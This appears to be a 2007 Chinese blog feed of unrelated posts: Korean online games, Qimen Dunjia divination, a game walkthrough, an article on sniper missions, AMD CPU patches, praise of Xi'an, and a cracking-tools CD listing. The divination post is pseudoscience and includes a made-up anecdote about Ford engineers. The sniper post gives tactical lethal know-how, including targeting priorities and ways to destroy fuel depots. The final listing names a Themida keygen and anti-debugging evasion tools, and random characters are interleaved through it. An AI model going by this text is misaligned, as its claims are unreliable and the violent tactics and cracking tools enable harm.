韩国网游厂商喜欢动用法律武器，但是它们自身却在一而再地无视中国的法规、政策。如果久游网关于T3涉嫌勒索的说法属实，那么T3的行为就属于违约。据悉，久游网已向T3发出了律师函，反诉T3。也许是没有意识到久游网有这么大的反应，此前向国内媒体公布了诸多与久游网纠纷细节的T3新闻发言人Jeng hayoon对此表示，“我们暂时对所有事情不发表评论。”T3方面前后态度的变化，让人玩味…… 　　在逃避进口监管方面，韩国网游的表现更可以说是劣迹斑斑。据业内人士介绍说，按照国内的规定，进口一款网游产品必须经过国家新闻出版总署的严格审批，但对国产网游来说，只需要在省一级新闻出版机构进行备案手续。因此，很多韩国网游公司便想办法逃避中国政府的监管。其中最常见的办法就是“偷梁换柱”——与国内的合作伙伴携手，把“外资公司”变成“内资公司”，躲开严格的准入门槛。其实，这也很好理解，劣质的韩国网游根本无法达到质量合格的标准！　　在不久前闭幕的Chianjoy上,新闻出版总署署长柳斌杰称，2006年，国产网络游戏已经达到了64.8%的国内市场占有率，曾经占据国内网游市场大半江山的韩国早不复当年之勇。会上公布的一份网游调查报告也指出，目前国内网络游戏市场排名前十的产品中，除了经过本土化改良的《热血江湖》以外，已无韩国游戏的身影。　　是啊，7年了，再好吃的菜也该吃厌了，何况本来就是难登大雅之堂的韩国泡菜呢？是时候向韩国网游告别了…… 　　来源：eNet 作者：小　捷

奇门遁甲（转）

Sun, 29 Jul 2007 08:30:23 GMT

奇门遁甲【简介】奇门遁甲，原来是中国古老的一本书，但它往往被认为是一本占卜用的书，但有的说法是说《奇门遁甲》是我国古代人民在同大自然作斗争中，经过长期观察、反复验证，总结出来的一门传统珍贵文化遗产。还有的说“奇门遁甲”是修真的功法。 “奇门遁甲”的含义是什么呢？就是由“奇”，“门”，“遁甲”三个概组成。“奇”就是乙，丙，丁三奇；“门”就是休，生，伤，杜，景，死，惊，开八门；“遁”是隐藏的意思，“甲”指六甲，即甲子，甲戍，甲申，甲午，甲辰，甲寅，“遁甲”是在十干中最为尊贵，它藏而不现，隐遁于六仪之下。“六仪”就是戊，己，庚，辛，壬，癸。隐遁原则是甲子同六戊，甲戌同六己，甲申同六庚，甲午同六辛，甲辰同六壬，甲寅同六癸。另外还配合蓬，任，冲，辅，英，芮，柱，心，禽九星。奇门遁的占测主要分为天，门，地三盘，象征三才。天盘的九宫有九星，中盘的八宫（中宫寄二宫）布八门，地盘的八宫代表八个方位，静止不动，同时天盘地盘上，每宫都分配着特定的奇（乙，丙，丁）仪（戊，己，庚，辛，壬，癸六仪）。这样，根据具体时日，以六仪，三奇，八门，九星排局，以占测事物关系，性状，动向，选择吉时吉方，就构成了中国神秘文化中一个特有的门类----奇门遁甲。【奇门遁甲起源传说】根据古今图书集成记载，奇门遁甲起源於四千六百多年前，轩辕黄帝大战蚩尤之时；当时我们的祖先黄帝和蚩尤在涿鹿展开一前所未有的场大战，蚩尤身高七尺，铁头铜身刀枪不入，而且会呼风唤雨；在战场上制造迷雾，使得黄帝的部队迷失方向。有一天晚上，三更半夜大家都在睡觉的时候，忽然，轩辕丘上传来惊天动地的声音以及非常强烈的光芒，惊醒了黄帝及众人。於是大家匆匆忙忙的起床，跑过去一看，原来是有一支彩虹自天空中缓缓下降；从中走出一位全身大放光明的仙女，仙女手上捧这一个长九寸阔八寸的玉匣，黄帝接过来打开一看，里面有一本天篆文册龙甲神章；黄帝根据书里面的记载制造指南车终於打败了蚩尤。龙甲神章除了记载兵器的打造方法之外，还记载了很多行军打仗遣兵调将的兵法。於是黄帝要他的宰相风后把龙甲神章演绎成兵法十三章，孤虚法十二章，奇门遁甲一千零八十局。後来经过周朝姜太公，汉代黄石老人，再传给张良，张良把它精简之後变成现在我们看到的奇门遁甲。在我们小的时候，学校教我们说，我们的祖先黄帝发明了指南车；可是你们知道吗，福特汽车在研发过程中，动用了一百多个工程师无法解决的问题，後来在记载中国古科学的书上，找到指南车的制造方法，才找到答案，用变速齿轮解决汽车转弯时的平衡问题。你知道变速齿轮是什堋吗？你相信四千六百多年前的老祖宗有这种智慧吗？【从科学的角度来看奇门遁甲】奇门遁甲的演绎过程中，用八卦记载方位，用十天干隐其一，配九宫记载天象及地象之交错，用八门记载人事，用九星八神记载周遭的环境。有时间，有空间，充分的表现出古人宇宙观的智慧。我们都知道影响我们吉凶祸福的不只是地球空间慨念的方向，日出日落，月圆月缺，春去秋来，无不与我们的生活息息相关；而日出日落春去秋来是宇宙星体随著时间变化的运转结果；相同的空间、方向，在不同的时间，以宇宙观来看其实是完全不同的。所以说奇门遁甲是宇宙宏观的学问，有时间，有空间的观念，是一种研究时空动力的超时代学问。【奇门遁甲的现代功能及运用】因为奇门遁甲是一种时空交替的磁场表现，以前封建时代皇室用以来遣兵调将出奇制胜。现在我们则用以推算出某个时间的吉方，来增加事情成功率。如求财，考试，求职，索债，求医，出国旅行，博戏战斗，围捕盗贼等都有很好的效果。另外，奇门遁甲用时盘来占卜推算事情更是出神入化，快速又准确。如果研究的人能够掌握其中奥秘使用起来那是神奇非凡。当然，除了以上叙述之外奇门遁甲还有很多其他用途，端看使用者巧妙不同。但这其中也带有一定的迷信成分。【奇门遁甲八门吉凶】所谓八门是指奇门遁甲跟据八卦方位所定的八个不同角度。休门、生门、伤门、杜门、景门、死门、惊门、开门各有不同的代表意义。 (1)休门求财、婚姻嫁娶、远行、新官上任等诸事皆宜。休门的气比较轻松，故很适合出外旅游或非正式的商业活动。 (2)生门谋财、求职、作生意、远行、婚姻嫁取等诸事皆宜。生门有生生不息的意思，故最适合求财作生意或有病求医。 (3)伤门伤门意为破坏的磁场，若强出伤门易见血光，故一般吉事皆不宜。但很适合钓鱼打猎、博戏、索债或围捕盗贼，利刑事诉讼。 (4)杜门杜门有隐藏的意思，适合隐身藏形躲灾避难，其於诸事皆不宜。若要躲起来不让人发现杜门最适合。 (5)景门景门是八门之中除开休生三门之外另一吉门。景门最利考试、广告宣传活动、远行婚姻嫁娶等皆宜。 (6)死门死门最凶，除吊丧捕猎之外其馀诸事不宜。 (7)惊门惊门有惊恐怪异之意思，若强出此门易遇惊慌恐乱之事，利民事诉讼。 (8)开门宜远行，利求职新官上任、求财、婚姻嫁娶、访友、见贵人。不宜政治阴私之事，易被他人窥见。【排局布盘】经云：穷则变，变则通也。动者，生吉凶也。动何能生吉凶?由时间，空间配合而生之差异，配合之妙，自由吉祥；配合不妙，便有凶事。时间，吉日良晨也。空间，方位也。两者合之，古人之奇门遁甲者也。奇门遁甲的产生与军事切切相关，自古被称为帝王之学。其用途大致有两个方面：其一是法术方面，主要是道教中的玄学，如遁法、隐身法、障眼法等，甚至呼风唤雨。其二实择吉占验，用来预测在什么时间，什么方位干什么有利，在什么时间，什么方位干什么不利。遁甲之法，以甲乃太乙人君之象，为十干之首，常隐于六仪之下(六仪者，戊己庚辛壬癸也)，故谓之遁甲。所畏者，庚金也。金能克甲木，庚为七煞之首也。乙乃甲之妹，甲以妹乙嫁于庚，乙与庚合而能救甲，故乙为一奇。丙为甲之子，丙火能克庚金而救甲，故丙为二奇。丁为甲之女，丁火亦能克庚金而救甲，故丁为三奇。奇门遁甲的具体应用，是通过排局布盘来进行的。所谓排局布盘就是按照不同的年份、节令、时辰，将八门(休生伤杜景死惊开)、九星(天蓬、天芮、天冲、天辅、天禽、天心、天柱、天任、天英)、九神在洛书九宫上布出适当的组合，依此判断吉凶方位。所谓局，有阳遁九局和阴遁九局共十八局。排遁甲盘分为八个步骤：1.查排演时辰的干支2.定阳遁还是阴遁3.排地盘4.排天盘5.排九宫6.排八门7.排九星8.排九神

轩辕剑叁视频攻略集锦

Fri, 20 Jul 2007 15:43:42 GMT

趁热打铁，趁着有心情的时候把轩叁的视频攻略先做出来。现在做完了，激情也消退了，暂时不做了…… 录制轩叁的视频才忽然发觉，其实轩叁的整体剧情也并不是很长。打开变速齿轮，使用修改器，大约4个小时就可以通关了。不过有时候因为在战斗中速度开得过快，还没来得及反应就被敌人灭团的事情也常有发生，频繁的逃跑也导致经常跳出游戏让狐狸抓狂不已…… 轩叁的内容看起来没有天之痕那么多，但是花的功夫可不少，视频时间之所以段了是因为压缩...[阅读全文][和讯博客]

狙击手的任务

Tue, 17 Jul 2007 14:33:12 GMT

狙击手的任务按照性质来分，有指定猎杀、随队观察、火力支援、巡逻狩猎、非硬性装备破坏与定点清除几种，以下就各种不同的任务性质分述如下： 1、指定猎杀即将上级所指定被狙击的目标以一切手段终结就算完成任务，狙击手狙杀目标无论什么方法都可以，以步枪远程狙击只是方法的一种，十字弓、猎弓、吹箭、弩箭、飞刀甚至近身搏击、格斗、刀具、绞杀器或下毒都可以，身着伪装服以步枪狙击的远距离猎杀只是一般人对狙击手的错误印象，不过在军事性的任务中远离目标的远程狙杀仍是大多数狙击手的选择，而大多数的训练也朝此种方向来施以训练，所这里只介绍枪械狙击。指定猎杀的执行方式很多种，较长被采用的方法是狙击手潜行至目标所在基地或预期经过的道路上以伏击的方式进行狙杀，而由于现代步枪的射程几乎都超过1000m以上，地点的选择、射击与后撤路线的安排经常是任务成败的关键，因此任务目标区的先行勘探与地点选定是相当重要的功课。虽然现代的卫星可以照到地球的每个角落，但在树木参天的密林与山谷暗处仍是以人员所侦查的第一手情报最可*，而大多数的狙击手也宁可自行侦察而不愿依*先进的卫星科技。指定猎杀的任务可以1人执行，也适用于2人小组，以一人观察1人狙击，或者2人同时狙击，或主射手未能成功时副射手再补一枪，当然副射手的枪法也必须是一流的，并且随时维持准备瞄准射击的状态。 2、随队观察及火力支援在现代部队中狙击手是编制到班、排级等基层战斗单位。当小队在进行战斗巡逻任务，遭遇敌人远程火力（也许是重炮、迫击炮、重机枪或敌人的狙击手）攻击而又无法呼叫火力支援时，随队的狙击手便必须立即进行敌人火力观察的任务并立即进入有利的射击位置以狙击步枪格杀最大威胁敌人，并依序将敌方人员一一狙杀，而小部队则利用敌人遭狙杀、人人自顾不暇之际转移。一支步枪所能发挥的效果与远程炮兵的火力支援一样，这便是所谓的随队观察及火力支援。但这仅是随队观察任务的一部分而已，随队狙击手最重要的任务是以狙击手的角度与眼光来看任务小队的所在位置是否过于容易遭受狙击并随时检查各个可能躲着狙击手的角落，是否有敌人的狙击手潜伏？并在第一时间内解决敌人的狙击手，另外狙击手同时也是路线选定与脱逃专家，在受到伏击时随队狙击手除了提供火力支援外也必须在可能的情况下提供小队指挥官最佳撤退路线建议并全程提供火力支援与掩护，必要时狙击手将会单独行动前往地区进行狙击任务，迫使敌人暂缓追击小队的火力，给小队最大的空间，狙击手再依事先的约定前往汇合点或自行完成指定任务，而大部分的狙击手由于长期的眼力训练与注意力训练，诡雷的发现与拆除对很多狙击手而言并非难事，虽然很少是由狙击手进行拆弹工作但是一旦任务需要时狙击手应可轻松胜任。我军狙击手的任务还包括在平时即记录各个可能潜伏地点与敌阵地位置，并针对阵地周围情况进行观察、记录、判断与模拟可能状况，一旦状况发生变化时本身可立即进入情况，也可以提供情报供战地指挥官作分析判断，因此狙击手同时肩负着情报官的工作，但无论在什么情况下狙击手总是以其专业的眼光来看待这个世界，同时以专业的角度判断情势的变化，永远是指挥官们了解情报的权威管道，因为只有狙击手才能了解并知道狙击手的想法与做法，也才能知道如何去预防与侦测。 3、巡逻狩猎在许多情况下战地的情势经常是扑朔迷离的，既不知人、时、地、事物，也不知情势的发展与变化，为了确保情势对我有利，猎杀敌人重要关键人员是一个釜底抽薪之计，而由于情报有限，任务目标指派会造成困扰，因此以指定区域进行自由猎杀便成为有效的作战模式，以狙击小组在指定区域内进行猎杀往往会受到莫名的奇效。倘若任务失败损失的也不过是2名人员与其随身装备而已，可谓本轻利重之买卖，但由于情势的变化往往出人意表之外，巡逻狩猎任务的执行时间往往不长，最多以2周为限，以防任务的执行与局势的发展产生落差。 4、非硬性装备破坏前面提到狙击手的任务往往不单纯是人员的狙杀，装备的破坏亦为重点项目，特别是对于机械化部队而言，非强化装甲的一般车辆都能由7.62mm口径的狙击步枪造成致命性破坏，以常见的2.5吨载重卡车而言，直接射击水箱、轮胎会造成车辆无法行驶，但若直接射击油箱则会使车辆产生爆炸，若车辆装载的是油料、弹药等高易燃性物质则可造成更大的破坏。若是整队的坦克战车当然无法以步枪解决，但若解决部分的战车车长也值回成本，要诀是须由后向前格杀车长，根据经验，在45秒内即使是同车乘员亦无法判断出车长是否已经遭袭身亡，而前车更是非经呼叫3-5分钟内不会发现后车的动态，这段期间内被狙杀的车长也不只个位数了，若战车以紧闭舱盖方式前进狙击手也可利用击毁通讯天线或击爆车外副油箱的方式逼使人员离开车体后再一一狙杀。对付战斗直升机亦然，击毁其光电观测器就等于毁其耳目，而击毁其主旋翼与尾旋翼则如同废其四肢，若是射击接近排气孔部位的变速齿轮箱与液压管亦会造成飞机失事坠机，不然射击火箭弹仓造成火箭内燃使弹药在未脱离机身前爆炸也是解决攻击直升机的方式之一。通讯车、基地等高精密仪器的破坏则更为简单，于电源车、冷却器、通讯天线与精密电路、晶片所在位置随便一发子弹都可以对这些价值不菲的装备造成致命性破坏，其他像是油料的对方电、车辆调度场与弹药堆积所等地也可以用步枪加以破坏。以油料堆放点而言，首先以一发微声铅质软弹头击穿油桶但不使其爆炸，等油料外泄得到处都是后再以一发高爆弹、燃烧弹或曳光弹加以引爆，那时就会惊天动地一发不可收拾。破坏性狙击任务的执行要诀就是先知道要打什么，再决定用何种弹药射击什么部位，三个条件要素都具备的话任务便不难达成了。 5、定点伏击由于狙击地点的所在位置必须考虑很多因素，寻之不易，一个好的狙击点不善加利用实在太可惜。应在有效射距范围内解决一切有价值的目标。而在狙击目标选择上则有一个狙击手们都知道的优先序列： 1）敌方狙击手，唯一会对狙击手造成威胁的便是敌方狙击手，敌方狙击手永远列为第一顺为 2）高级指挥官 3）防空导弹、反坦克导弹操作员 4）重炮观测手、炮手、炮长、副炮长、轻重机枪射手与迫击炮炮长等长程攻击武器操作员 5）资深士官或士官长 6）枪榴弹兵、爆破小组与战地工兵除了这些优先顺序外其余目标与执行的先后顺序则由狙击手自行决定，而其判定的标准是对我方威胁性较大者优先顺序越高，不但是人员，装备亦然，油料车与弹药车的优先顺序必然高于人员输送车的道理永远是不会改的，除非有战略上的考虑，但那已经不是狙击手的责任范围了。 6、狙击手于市区的任务试想特种部队突然被派到一个陌生的地方参与维持和平部队的解围，又或者要到大城市市区维持秩序、处理劫机事件、解救被挟持的人质及保护无辜市民，一个狙击手出于什么角色呢？在这种情况下使用狙击手是否是一个最恰当的选择呢？答案明显是“是”。狙击手到达一个被武装分子控制的区域内，其任务就是在获得上级指令及核准后向特定的目标发出最准确的攻击，然而此情况只会在指挥官认为武装分子即将对部队或拼命作出伤害，否则指挥官在正常情况下不会向狙击手发出此指令及核准。狙击手身处这情况下其更加重要的的任务是收集及报告，除此之外跟随情况及需要狙击手还会被委派以下任务： 1）清除区域内武装分子的狙击手 2）清除区域内进行抢劫、绑架、挟持人质等等的武装分子 3）负责对一个特定的区域进行观察及监视，并记录及报告区域内的军事活动 4）利用自己处身隐蔽的优势协助其他部队行动 5）保护区域内其他部队，包括消防队，工程队等等 7、狙击手在市区环境执行任务的技巧 A、行动位置怎样在一个充满敌人的地方安排狙击手执行任务而又不能被发现是一个值得考虑的问题，这并不是没有可能，但需要高强度的训练。不单指狙击手本身，就连支援部队也需这样。在每天的行动中为了不被敌方发现及保障狙击手自身安全，有时候需要分散敌人的注意力，维持和平部队通常驻守一些比较危险的位置使敌人注意。狙击手应尽量选择远离维持和平部队的地方作为行动的据点，使维持和平部队成为分散敌人注意力的工具，以免被敌人发现。为了避开敌人的巡逻队伍和侦察耳目狙击手须在一段时间转移行动位置，不然长期停留一个行动位置只会使狙击手被敌人发现。 B、市区狙击及藏身地点选择狙击及藏身位置对狙击手来说是行动中成败的关键，能否勘查整个区域就是能否控制整个区域的主要因素。依常理来说选择狙击位置通常是越高越好，这就是我们常说的“制高点”，但对于市区的战斗环境来讲这是一个致命的错误，因为狙击手需要从制高点向下俯瞰整个区域而经常忽略身边的即时危险，举例：狙击位置位于一栋20层大厦的顶楼平台，狙击手要观察下面的大街他便要探头出去俯瞰，位置立刻就会暴露，到时狙击手对于附近环境所需要应付的突发情况及意外就无法预计了，而这些突发情况及意外更是比下面的大街接近和快速，例如对面的楼宇藏匿了敌人狙击手，那便非常危险了。模仿电影电视剧中在楼顶天台开枪是非常愚蠢的事情，切记任何时候都不要以天空作为背景色，如果那样随便一名接受完基础射击训练的敌方狙击手可以在200米外轻松命中你身上“10环”的位置，所以于市区环境选择狙击位置必须全面兼顾近、中、远三个距离，狙击位置应设于不高过15米的地方，就算暴露了位置也有足够的时间跑到大街上混入人群当中逃走，除非任务性质特殊（一般是警方任务，没有战术要求也不管善后事宜，只负责受命开枪）否则绝对不建议再往更高楼层走，最愚蠢的狙击手也知道那里是死路一条。以下作为狙击及藏身的地方： 1）破旧的楼宇或建筑物。对于此类地方狙击手必须堤防陷阱，一个最好的方法就是留意有没有人经常在这楼宇出入，特别是小孩。（反之亦可加以利用） 2）商店 3）学校或社团聚集地，例如教堂剧院 4）工厂 5）市区附近已经荒废的地方 6）楼宇两层之间这是一个非常好地的狙击及藏身位置，纵使没有窗也没有一个良好的射击平台。在这些地方要移去某些砖块或石块去制造一个窗口或射击平台，但是这些砖块石块于观察及射击后必须放回原位，否则会影响楼宇外观而引起敌人注意。 8、综合来说，一个良好的狙击及藏身位置应有以下特征： 1）有一条安全及宁静的路线，如果可以的话应尽量避开空罐、破旧的墙、经常有猫狗类出现地以及其他会暴露狙击手存在的地方 2）有一个安全的出口及入口 3）有宽阔的观察角度 4）舒适（大部分狙击手都不会把这条作为参考条件） 9、当一个狙击手设立一个狙击及藏身位置之前应先考虑以下几点： 1）获委派任务的性质 2）须逗留的时间 3）当地情况及形势 4）进入位置的时间及步骤 5）紧急撤离的步骤 6）友军部队的行动 7）撤离位置的时间及步骤 8）所需要的特别装备 10、处理挟持人质事件不论指挥官或狙击手本人都希望子弹击中恐怖分子令其立即死亡，但就算是最好的狙击手配合最好的狙击步枪及子弹也绝对不能保证有此理想的效果。因为纵使该名恐怖分子刹那中弹，手臂神经和肌肉不自主的痉挛抽搐也会导致向人质开枪射击，所以指挥官在无其他选择的情况下才会使用狙击手应付挟持人质的情况。 A、准确度的要求：所有的医生都知道人体只有一个地方被破坏才会使得瞬间即时死亡，这就是大脑的运动反射神经区（心脏中枪者仍可存活8-12秒的时间），人的头部算是比较大的目标，直径大约有20-25公分，但能够真正使得瞬间即时死亡的部分其实非常小，脑部控制运动反射神经的地方位于眼睛后面，其大小不足6公分，换言之狙击手要想一枪瞬间毙命他实际所能瞄准的目标只有6公分而不是20-25公分，再加上湿度、密度、风向、角度、气压、子弹抛物线以及后作用力的影响，要一个普通的特种部队狙击手于200米外发出能做到瞬间即时死亡的一击是十分困难的，要达到这个目标狙击手需要在不同环境中练习使用多种狙击步枪与子弹的配合，以致熟练了解瞄准的方位角度。 B、狙击位置的选择：这与之前所提及过关于市区战场选择狙击及藏身位置的课题并没有多大分别，射击位置的高度选择不再是局限，只是需要将之前的理论充分运用便可找到合适的狙击位置了，但必须注意以下事项： 1）虽然狙击手是到了非用不可的情况下才被使用甚至绝大部分任务一枪不发，但狙击手也必须尽早到达现场，因为狙击手需要准确测量目标距离，确认恐怖分子及人质方位，选择最佳射击位置及演练虚拟射击。 2）如果情况环境需要射穿玻璃，狙击手必须注意以下两点：（1）当子弹穿透玻璃的同时其金属外壳会被玻璃刮落部分碎屑以圆锥形范围随机射出，情况与散弹枪的原理一样，不论击中恐怖分子或人质都可能造成受伤甚至死亡，而弹体本身仍然会继续以直线飞向目标，就算成45度角撞击玻璃此情况也是一样。（2）当子弹撞击玻璃的时候，玻璃碎片会以90度垂直向房内飞去，此点必须留意。

关于AMD双核补丁

Thu, 12 Jul 2007 04:41:09 GMT

到目前为止关于双核处理器的补丁一共有四个，其中AMD的补丁有2个，微软操作系统的补丁有2个。首先是AMD的第一个官方补丁，这个补丁解决的是在运行部分游戏时突然加速的问题（类似于使用变速齿轮之后加速）；AMD的第二个补丁程序是针对一些具体程序的优化措施。微软的第一个程序补丁包是KB896256，这个程序解决部分双核/多处理器在Windows XP下下降的问题；第二个程序（KB924441）是是解决部分特殊情况下处理器失去相应的问题。阅读全文类别：硬件・tips 查看评论

要离开的城市-西安

Tue, 10 Jul 2007 09:48:42 GMT

西安高新产业技术开发区是全国唯一三个国家级高新技术开区之一（北京中关村，苏州高新科技园，西安高新技术产业开发区）　　西安的历史文化是全国任何城市没有办法比较的。（5000多年历史-黄帝）　　西安的军工企业，科研院所数量排全国第3，仅次于北京上海。　　神州飞船百分之80的零件是西安生产的　　国庆大阅兵一半的武器是西安生产的　　全国唯一的卫星测控中心在西安　　全国唯一的飞机试飞研究院在西安　　西安周围有120多座帝王陵墓围绕　　亚洲最大的音乐喷泉-大雁塔北广场　　西部最大的海洋公园-西安海洋世界-海洋馆　　西部最大的野生动物园“西安秦岭野生动物园” 　　西安有世界上保存最完整最大的城墙　　西安有公办高校32所，民办高校29所，在校大学生共120万多人，有著名的西安交通大学，西北工业大学，教育部直属的6所重点师范大学之一“陕西师范大学”，西北农林科技大学，等等（其中进211工程6所，进985工程3所）　　陕西省有两院院士43人，其中西安有42人，数量居全国第4，（北京第1，上海2，江苏3）　　西安部队院校11所，有全军著名的第四军医大学，第二炮兵工程大学，空军工程大学，武警指挥学院，武警通信学院，西安陆军学院，西安政治学院，武警工程大学等等　　还有世界第八大奇迹“兵马俑”！！！黄帝，秦始皇，刘邦，项羽，汉武帝，卫青，霍去病，张骞，司马迁，班超，唐太宗，杨贵妃，王昭君，武则天，李白，杜甫，白居易，孙思邈，等等都是西安历史的见证，也是中华文明的见证！！！！　　还有震惊世界的西安事变！！　　解放前西安以一票之差落败与北京，没有成为中国的首都！！　　军事情况：兰州军区的唯一两个集团军：47军，21军，都驻扎在西安！！　　西安有西北第一高楼，全国第6高楼“西北信息大厦” 　　西安有5星级酒店7家，4星级酒店34家　　西安有全国接待人次第三大旅行社，西安中国国际旅行社　　西安有国防军工大厂14家，其中生产导弹4家，炮弹2家，兵器8家，军用重型卡车1家　　西安有全国唯一的火箭发动机生产基地067基地　　西安有全国唯一的生产卫星导航的研究所504所　　西安有全国唯一的生产航空导航控制系统的618所“ 　　还有各类研究所40多所　　国家测绘局5个测绘大队3个在西安。（广州1个，沈阳1个）　　有全军唯一的作战测绘研究所　　中国最具活力的六个城市之一　　全国5大消费向导城市之一（北京、上海、广州、西安、成都）　　全国12大吸引人才的城市之一：北京、上海、广州、深圳、南京、天津、西安、杭州、沈阳、成都、济南、哈尔滨　　综合科技实力居第三高校数量与（西安有大学44所，学生80万人，其中5个民办高校学生就已达13万）　　研究所数量第三（北京、上海、西安。500多个科研机构，34万科技人才使其军工科技力量居全国大中城市第二位，全省有科研单位2000多个，17个专业是全国惟一的，50个专业在全国处于领先地位。有国家级重点实验田10个，国家部门专业，专项实验室63个，省级重点实验室49个，拥有各类专业技术人员85.1万人，院士46人：）、人才密度度雄居各省会城市直辖市第一，国内近次于北京.武汉和西安在每万人在校大学生数方面排名分列第一、第二。　　高新技术产业开发区全国第3，入住世界500强210家名企西安04年前四个月固定资产投资额位居全国前十，增副则高达80.4%，高居全国各城市榜首电脑城数量位居前列且塞格是全国十大以及软件产业的发展、西部通信主节点，全国四大节点（北京上海广州西安）之一国内第四大现代艺术城市（广州、上海、北京、西安）、书店数量雄居前列以及西部最大书城-西安图书大厦城市天然气气化工程--全国第一条天然气汽车线路；国内仅此于北京的城市汽化民航-国内内陆四大机场之一，西安的机场客运量排列到全国第6位，在去年运量增长速度全国第一的基础上，04年前一季度又保持了60%的高速增长，又是全国第一　　六大铁路枢纽之一电工城--国际电工组织成员单位，全国最大的高压、超高压交直流输变电设备和通讯电缆、微分电机、电力电子装置等科研、开发、生产、贸易、金融为一体的电工集团之一高压，超高压交直流变压器占据国内70%的市场占有率，并远销欧美，同时通讯电缆、微分电机、电力电子装置都在国内有着高额的市场占有率全国各大空调厂家大部分的空调压缩机都是西安东方机电集团制造西安拥有目前CDMA的核心技术，我国市场上大部分的CDMA都用的是西安大唐屏蔽词语的芯片目前国内只有4个制造锂电池原料的厂家，而其中规模最大的，产量最高的一家在中国西安小灵通97年在西安上市，并且核心技术始终掌握在这里（斯达康西安研发中心）中国第一枚“长二捆”运载火箭发动机、第一只彩色显像管、第一块集成电路、第一架民用客机、第一台100万伏超高压空气断路器。　　西安三元企业集团投资兴建了国内第一家培养游戏设计人才的专业学校，成为企业培养特殊技能软件人才的典范　　中国最先全面生产环保型液体洗涤剂的高科技环保化工企业和医药集团　　亚洲最大的音乐喷泉广场、中国西部最大的野生动物园、西部最大的唐文化区——曲江旅游文化区　　亚洲最大的景观步行街--大唐不夜城　　2003年西安市国内生产总值达到943亿元，04年将跻身千亿大关。地处西部在经济上的优势几乎由高科技带动，本土工业重振在即。国内大部分重型汽车都用的是西安制造的变速齿轮。　　人口741万，西安接受9年义务教育以上的人口为486.73万，每10万人中拥有大学文化程度的有10932万人。　　城市人均可支配收入为7184元，全国13位。　　重工业基地:全国大中型军事和民用飞机设计、制造、试飞的重要基地（西飞是国内战斗机生产基地；煤炭储量1625吨；　　石油预测远景储量11亿吨，已探明储量7亿吨；　　天然气预测储量20000亿立方米，已探明储量3200亿立方米，是我国陆上发现的归大整装气田之一。）　　农业现代化：国家唯一一个高新农业示范区杨凌；中国杨林农业高新科技成果博览会，与北京国际周、上海工业博览会、深圳高交会同为中国四大科技展会之一。　　交通概况（全市公路里程2800千米，有5条国道和12条省道经过市域，目前，西安至潼关、至黄陵、至天水、至阎良、至蓝田高等级公路已建成通车。使西安成为连通省内及西北、中原、西南的重要交通枢纽；东起中国连云港、西至荷兰鹿特丹的横跨欧亚大陆的铁路线从西安市区穿过：　　西安国际航空港西安咸阳国际机场已开通国际国内航线80多条,西安有8条国道和2条西部大通道汇集，有7条干支铁路交汇。　　西安不好，理由如下： 1走不了多少米就有一所高校，让没啥文化的人很是自卑； 2书店太多，麻将馆几乎找不到，大众娱乐太匮乏； 3城太大，从城北到城南的一个朋友家玩，坐车居然坐了两个多小时； 4迪吧、酒吧很多，DJ、领舞品质也很高，但酒水都太贵，消费不起 5小吃太多太好吃，经常让我忘了正餐，结果营养不良； 6人都太耿直，只会说实话，总是整得我很无奈； 7老城区太老，高新区太新，总让我有种在两个城市的错觉； 8市领导太笨，不会宣传，西安这样的城市要是在东部，苏州、杭州就没啥可张狂的

加密与解密工具新年大礼包2007光盘

Fri, 6 Jul 2007 00:44:19 GMT

加密与解密工具新年大礼包2007 CD1ZCrack New Year Presents 2007 EditionYkqfPEDIY看雪技术论坛 & China BCG荣誉出品HN+==========================================v本光盘主要收集了常用的破解工具，工具来自bbs.pediy.com兄弟们的分享，我们主要是22%c负责整理了一下，做个列表和启动，不足之处请原谅！1$yZV0本次以精简实用为目的，因此主要收录一些常用工具为主，文档资料不太多。目前这些]文件对于加解密爱好者来说，基本上够用了。2008年的大礼包可能将以DVD形式发布，到时尽K`可能收集相关的资料。}z特别感谢Allone制作的大礼包封面！ *oL由于精力实在有限，对本光盘的不足之处请大家海涵。+x^O{祝2007年顺心、快乐、健康、幸福！w45}DOchina©SKY论坛 -- 我们的SKY，我们的天地　　O4)w#http://bbs.pediy.comJ&u2007-01-011特别提示：ZN由于一些工具被应用在病毒或木马上，特别是一些壳，因此杀毒软件会将这些工具直接当病毒或木马处理。$!^倾力推荐 d1.hying's 加壳工具PE-Armor 0.765版。lA2.forgot's ROMRA 2，支付PE-Armor全系列aqfu3.shoooo's TheMida注册机。yga下载 ©SKY论坛 -- 我们的SKY，我们的天地　　R!D_E光盘容量694M，ISO格式。aBnmp-7I目录列表:">附：本光盘内容均来自互联网。"================================================================================RZWyb├─Debuggers ;调试器O<~Q│ ├─OllyDbg}│ │ ├─plugin ;各类OllyDbg插件V$FPI(│ │ ├─OllyICE ;OllyDBG修改版，新增一些功能或修正一些bug，取名OllyICE只是便于区分，其实质还是OllyDBGb82Wa7p│ │ ├─TRW1.03~MZ@_z│ │ └─plugin ;各类TRW2000插件yB│ ├─WKTVBDebugger ;专门动态调试VB Pcode编译的程序cT7│ ├─SoftICEaNf;│ │ ├─DriverStudio ;3.2版本，内置SoftICE)dp[│ │ ├─ICE_toolsmkOw2k│ │ │ ├─Nmtranspath ;如果Symbol Loader不能中断程序入口点的问题，用这工具补丁一下n│ │ │ └─Iceext ;可以隐藏SoftICE，扩展SoftICE命令k4cX│ │ └─softice 4.05 fox win9x ;经典的softice 4.05 ，仅工作在win9x 平台s|wS│ ├─RORDbg ;这是一个用虚拟机技术实现的简易Debugger，主要用于外壳分析和脱壳$>│ ├─Dos&_Q4│ │ ├─Softice ;DOS下的SoftICE\SL│ │ └─TR ;DOS下的经典调试器J│ └─debug_toolse@^+│ ├─PointH ;获得XP下的万能断点gJP│ ├─SuperBPM ;仅工作在Win9x/Me系统，调试时，保护硬件断点有效P9)x│ ├─VCDebuger ;主要解决VC用于破解中的以下不足yhMr2x│ ├─ollyscipt_editor ;专门为OllyDbg的插件ollyscript而写的脚本编辑器"~8(│ ├─xidt ;备份及恢复IDT的小工具，支持win2k/xp/2003P26?<5│ ├─fakeRDTSC ;不少壳代码使用rdtsc来检测运行时间，本工具欺骗程序，以躲过检测oJ$q│ ├─hwnd ;查看句柄)J=│ └─iceclock ;SoftICE调试时系统时钟会停住，此工具用来恢复当前时间H8%>3├─Disassemblers ;反汇编工具/│ ├─HDasm.q│ ├─MFVDasm$4x│ ├─PVDasmLr│ ├─borg ;一款开源的反汇编工具，研究反汇编的可以看看-Vi│ ├─IDA PRO ;重量级的反汇编工具，一般程序的反汇编都用它完成>│ │ └─plugins ;IDA的一些插件`z│ │ ├─ida2sice;#│ │ 